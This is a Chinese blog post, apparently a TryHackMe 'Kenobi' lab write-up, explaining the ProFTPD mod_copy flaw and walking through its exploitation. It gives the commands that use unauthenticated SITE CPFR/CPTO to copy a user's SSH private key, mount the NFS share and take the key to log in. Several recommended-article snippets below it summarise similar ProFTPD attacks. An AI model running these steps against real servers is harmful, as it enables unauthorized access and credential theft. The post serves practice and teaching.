使用 ProFtpd 获得初始访问权限

最新推荐文章于 2024-07-17 11:29:00 发布
最新推荐文章于 2024-07-17 11:29:00 发布
阅读量360 收藏 11
点赞数 9
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52923396/article/details/135079921
版权

ProFtpd是一个免费、开源的FTP服务器,兼容Unix和Windows系统。它在过去的软件版本中也存在漏洞。

漏洞原理:

ProFtpd 的漏洞mod_copy 模块。 

mod_copy 模块实现SITE CPFR 和 SITE CPTO命令,可用于将文件/目录从服务器上的一个位置复制到另一个位置。任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何 部分复制到选定的目的地。

靶机:tryhackme Kenobi

nc MACHINE_IP 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa 

接下来将 /var/tmp 目录挂载到我们的机器上

mkdir /mnt/kenobiNFS
mount MACHINE_IP:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS

直接去 /var/tmp 并获取私钥然后登录到 Kenobi 的账户

cp /mnt/kenobiNFS/tmp/id_rsa . //拷贝id_rsa到根目录
sudo chmod 600 id_rsa //赋予id_rsa文件可以读写的权限
 

淤泥下的月亮
关注
  • 9
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
php 禁止访问根目录某个文件_墨云 I 漏洞分析第七期—ProFTPD服务器任意文件拷贝漏洞分析(CVE201912815)...
weixin_35936248的博客
01-24 538
背 景ProFTPD是一个开源的,跨平台的FTP服务软件,支持大多数类Unix系统和Windows,是Unix平台下最流行的FTP服务软件之一。很多Unix和Linux发行版本系统都预装了这个软件,除此之外,很多流行的商业软件和网站也都使用ProFTP服务器。ProFTPD近日爆出了一个越权访问漏洞,这个漏洞在某些条件下可以导致敏感信息泄露或者代码执行。这个漏洞的CVE编号是CVE...
ProFtpd快速指南(转)
08-11 320
ProFtpd快速指南(转)[@more@]ProFTPD是一个Unix平台上或是类Unix平台上(如Linux, FreeBSD等)的FTP服务器程序,它是在自由软件基金会的版权声明(GPL)下开发、发布的免费软件,也就是说任...
靶机渗透练习57-digitalworld.local:JOY
hirak0的博客
04-19 3940
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-joy,298/ Description Does penetration testing spark joy? If it does, this machine is for you. This machine is full of services, full of fun, but how many ways are there to align the stars? Perhaps
digitalworld.local: JOY靶机-Walkthrough
ins1ght的博客
10-02 612
通过FTP匿名账户获取directory,对其中的信息筛选后,确定version_control为线索。site cpto将version_control拷贝到FTP的upload文件夹,最终发现ProFTPD存在命令执行漏洞,成功getshell。之后发现了patrick用户的密码,切换用户后,发现了sudo权限的test。由于patrick没有test的写权限,于是先创建一个test,内容为/bin/sh,后用put test上传到upload文件夹中,最后使用site cpto覆盖原有test,提权。
Linux下proftpd的安装配置与管理方法
08-18
ProFTPD 是一个功能强大且灵活的 FTP 服务器软件,它提供了许多高级功能,如虚拟主机、匿名访问、权限控制、日志记录等等。ProFTPD 的配置文件使用类似 Apache 的格式,使得它易于配置和管理。 二、软件的相关资源 ...
HHs proftpd-admin-开源
04-24
文件"release_0.1"很可能是HHs proftpd-admin的初始版本发布,包含了所有必要的文件和资源,用户需要按照官方文档或社区指南进行部署。 总之,HHs proftpd-admin是一款实用的开源工具,它为ProFTPD服务器的虚拟用户...
详细讲解架设FTP服务器的两种方法.doc
10-04
除了IIS,还有许多专业的FTP服务器软件,如FileZilla Server、ProFTPD等,它们提供了更高级的功能和更灵活的配置选项,包括用户账户管理、访问权限控制、日志记录等。这些软件通常更易于管理和配置,适合大型或复杂...
安装redhat和部署jdk_tomcat_mysql归纳.pdf
11-04
- 设置Proftpd在系统启动时自动启动,通过拷贝启动脚本、赋予执行权限并使用`chkconfig`命令。 - 使用`ftp`命令进行文件传输。 4. **部署Java环境(JDK)**: - 下载适用于Linux的JDK安装包。 - 使用`tar`命令...
基于Linux的网络教学服务器配置方案.pdf
09-06
5. ProFTPd:配置FTP服务,设置用户账户,限制访问权限,保障文件传输的安全性。 三、方案可行性 Linux操作系统在高校中广泛应用,具有良好的技术支持和社区资源。本方案结合开源软件,不仅降低了硬件成本,还保证...
ProFTPD使用
weixin_33779515的博客
04-09 175
1.安装 新版的proftp中已经有mod_quotatab了,所以不用另外下载了。 # tar -zxvf proftpd-1.2.10.tar.gz # cd proftpd-1.2.10 ...
ProFtpd快速指南
weixin_34319111的博客
03-27 279
ProFTPD是一个Unix平台上或是类Unix平台上(如Linux, FreeBSD等)的FTP服务器程序,     它是在自由软件基金会的版权声明(GPL)下开发、发布的免费软件,也就是说任何人只要遵     守GPL版权声明,都可以随意修改源始码。       ProFTPD设计目标是实现一个安全且易于设定的FTP Server。目前Unix或类Unix平台上  ...
教你配置安全ProFTPD服务器(下)
weixin_34221112的博客
11-29 232
教你配置安全ProFTPD服务器(下) 2009-07-31 19:30 在上两篇文章中(上、中),介绍了ProFTPD服务器的基本配置方法以及如何加固ProFTPD服务器,下面继续介绍配置安全ProFTPD服务器的其他安全策略。 四、其他安全策略 ...
proftpd的mod_copy模块未授权调用利用记录
HRay's blog
06-15 1360
文章来源自《安全参考》第30期,略有改动 影响版本: proftpd-1.3.4---proftpd-1.3.5 1.执行命令 nc x.x.x.x 21 2.执行site cpfr /etc/passwd可以未授权状态复制文件 3.执行site cpto /tmp/test可将之前复制的/etc/passwd粘贴到/tmp/test 高级用法: s
ProFTPD远程命令执行漏洞或影响100多万台服务器
NOSEC2019的博客
07-23 1263
ProFTPD是一个开源,跨平台的FTP服务软件,支持大多数类Unix系统和Windows,是Unix平台下最流行的FTP服务软件之一,且同时支持Pure-FTPD和vsftpd。 而最近,ProFTPD被曝出任意文件复制漏洞,可导致超过一百万多台安装了ProFTPD的服务器受到远程命令执行和信息泄漏攻击。 所有版本在1.3.5b及其以下的ProFTPD软件都会受到该漏洞影响,攻击者只要成功利用...
ProFTPD配置匿名登录与目录访问权限控制
热门推荐
朝歌
08-21 1万+
ProFTPD服务器配置匿名登录;限定用户只能访问自己的目录;配置匿名用户目录访问权限;Limit容器
cve-2015-3306复现
Yale的博客
04-02 3237
Cve-2015-3306 背景: ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入任意文件。 任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目标。 复制命令使用ProFTPD服务的权限执行,默认情况下,该服务在“nobody”用户的权限下运行。 通过使用/ proc / self / cmdlin...
网络安全-网络安全及其防护措施8
最新发布
LS_Ai的博客
07-17 1075
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
proftpd可能会导致network-manager.service无法使用
06-02
在一般情况下,proftpd和network-manager.service之间没有直接关系,因此proftpd不应该导致network-manager.service无法使用。但是,如果你在安装proftpd时进行了一些不当操作,例如修改了一些系统配置文件,这可能...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值